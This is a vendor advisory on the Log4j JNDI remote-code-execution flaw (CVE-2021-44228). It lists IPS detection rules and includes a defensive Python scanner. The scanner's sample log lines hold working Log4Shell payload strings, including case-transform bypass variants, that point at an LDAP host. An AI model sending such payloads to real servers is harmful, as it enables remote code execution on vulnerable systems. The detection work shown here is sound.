NVD (National Vulnerability Database) Reference
Background
Log4j is a powerful Java-based logging library maintained by the Apache Software Foundation.
In all Log4j versions >= 2.0-beta9 and <= 2.14.1, the JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From Log4j 2.15.0, this behavior is disabled by default.
Endian Impact
No Endian products or services are directly impacted by this vulnerability.
Endian Detection & Protection Capabilities
The most current version of the Endian IPS ruleset (dated Dec. 12, 2021) contains the following rules that can be applied to provide protection against the vulnerability:
| Rule SID | Rules Category | Rule Description |
|---|---|---|
| 2034661 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228) |
| 2034662 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228) |
| 2034663 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228) |
| 2034664 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228) |
| 2034665 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228) |
| 2034666 | emerging-info | ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228) |
| 2034670 | emerging-attack_response | ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain |
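As an added example (not Endian's code and not the ET ruleset itself), the following Python checker applies the same idea as the rules above to stored log lines: it resolves the `${lower:...}`/`${upper:...}` case-transform variants that the "upper Bypass" and "lower Bypass" rules refer to, then flags any line that contains a JNDI lookup afterwards. The sample log lines and the 198.51.100.7 address are constructed for the example.

```python
"""Flag Log4j JNDI lookup strings in log lines, including the
${lower:x}/${upper:x} case-transform variants ("upper/lower Bypass")."""
import re

# One case-transform lookup around a plain fragment, e.g. ${lower:J}.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# The JNDI lookup prefix itself, once any case tricks are resolved.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _apply_case(m):
    op, arg = m.group(1).lower(), m.group(2)
    return arg.lower() if op == "lower" else arg.upper()


def normalize_lookups(text, max_rounds=10):
    """Resolve nested ${lower:x}/${upper:x} lookups innermost-first, the
    way Log4j's substitution would, so '${${lower:J}ndi:' -> '${jndi:'.
    The round limit keeps pathological nesting from spinning forever."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(_apply_case, text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(line):
    """True if the line carries a JNDI lookup after normalization."""
    return _JNDI.search(normalize_lookups(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for each suspicious line."""
    return [(n, normalize_lookups(l)) for n, l in enumerate(lines, 1)
            if is_jndi_lookup(l)]


# Constructed sample access-log lines: two benign, three carrying lookups.
SAMPLE_LOG = [
    'GET /index.html 200 "Mozilla/5.0"',
    'GET /search?q=${date:yyyy} 200 "curl/7.79"',
    'GET / 404 "${jndi:ldap://198.51.100.7/a}"',
    'GET / 404 "${${lower:J}ndi:ldap://198.51.100.7/a}"',
    'GET / 404 "${${upper:j}${upper:n}di:ldap://198.51.100.7/a}"',
]

if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Lines 3 to 5 of the sample are reported; the `${date:yyyy}` lookup on line 2 is not, since only JNDI lookups are of interest here.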
Conclusion
Endian will continue to monitor the situation and provide updates to this article to keep our customers as informed as possible.